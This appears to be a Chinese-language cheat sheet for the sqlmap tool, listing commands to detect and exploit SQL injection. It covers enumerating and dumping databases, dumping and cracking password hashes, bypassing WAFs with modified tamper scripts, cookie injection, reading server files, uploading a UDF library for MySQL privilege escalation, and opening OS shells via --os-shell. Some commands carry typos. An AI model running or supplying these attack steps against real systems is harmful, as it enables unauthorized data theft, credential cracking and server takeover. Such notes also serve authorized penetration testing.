检测和利用sql注入
python2 sqlmap.py -u "[URL_SQL注入点]" [--batch]
--batch:自动选择sqlmap默认的选择
寻找目标
直接连接数据库
python2 sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --banner --dbs --users
数据库操作参数:
--dbs:列举数据库信息
--current-db:当前数据库名
--current-user:当前数据库用户
--users:列举DBMS中所有用户
--passwords:列举DBMA中所有账户和密码
-D [databases] …:指定数据库名,对库进行操作
-T [tables]:指定数据表,对表进行操作
-C [columns]:指定列名,对列进行操作
--tables:列举数据库表的信息
--columns:列举数据表的列名信息
--schema:枚举数据库结构
--count:枚举数据包的项目数
-D/-T/-C/--dbs/--tables/--columns/--schema/--count
联合操作就可以实现对数据库的具体操作
#列举库中的所有表: -D [库名] --tables #列举表中的字段名: -D [库名] -T [表名] --columns
--dump:导出数据
--start:指定开始的行
--stop:指定结束的行
# 导出当前全部的数据表数据 -D [库名] -T [表名] -C [字段名] --count --dump # 导出部分(范围)数据表数据 -D [库名] -T [表名] -C [字段名] --start {*} --stop {*} --dump
sqlmap技巧
利用注释的方法绕过waf注入
/tamper/halfversionecdmoreckeywords.py:
return match.group().replace(word, "/*!0%s" % word) # 修改 return match.group().replace(word,"/*!50000%s*/" % word)
/xml/queries.xml:
sqlmap实施注入:
sqlmap.py -u [url] --tamper ./tamper/halfversionecdmoreckeywords.py sqlmap.py -u [url] --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py
URL重写SQL注入测试
value1为测试参数,加*符号即可,sqlmap将会测试value1位置是否可以注入
列举并破解密码hash
当用户可以有权限查看用户密码的时候,--password会自动连接并破解hash返回结果
对目标进行爬取
--batch --crawl=3 从目标URL爬取网站
使用hex规避编码导致丢失
sqlmap.py -u [url] --banner --hex -v 3 --parse-errors
--parse-errors:解析和显示响应数据库错误信息
模仿移动端访问目标
sqlmap.py -u [url] --banner --mobile
--mobile:设定一个移动端的“User-Agent”模仿手机访问URL
智能判断测试
sqlmap.py -u [url] --bath --smart
--smart:快速判断 为报错注入点进行注入
结合Burp进行注入测试
在Burp——Options——"proxy.Requests"中保存Burp的抓包记录
sqlmap.py -r burp***.txt
从抓包记录中加载HTTP请求
sqlmap.py -u [url] --data "[*……*]"
自动填写表单
sqlmap.py -u [url] --forms [……]
--forms:解析和测试目标URL表单
读取Linux的文件
sqlmap.py -u [url] --file [url]
延时注入
sqlmap.py -u [url] --technique -T --current-user sqlmap.py -u [url] --delay 0.5 sqlmap.py -u [url] --safe-freq # 请求两次
Burp抓包利用sqlmap注入
sqlmap.py -r ***.txt -p [需要注入的参数]
-p:指定注入参数
sqlmap Cookies注入
默认情况下,sqlmap只支持get/post参数的注入,使用-level参数且数值大于等于2就会检测cookie参数,大概大于3时检查User-Agent和Referer
sqlmap.py -u [url] --cookie [value] --level 3 sqlmap.py -u [url] --cookie [value] --level 3 --tables sqlmap.py -u [url] --cookie [value] --level 3 -T [表名] --coiumns ……
MySQL提权
连接并打开一个交互shell
sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --sql-shell
上传lib_mysqludf_sys到plugin目录
sqlmap.py -d "mysql://[user]:[password]@[ip]:[port]/[dbs]" --file-write=
执行shell命令
sqlmap.py -u [url] --os-cmd=[^] #执行cmd命令(Win环境) sqlmap.py -u [url] --os-shell=[^] #建立交互式的shell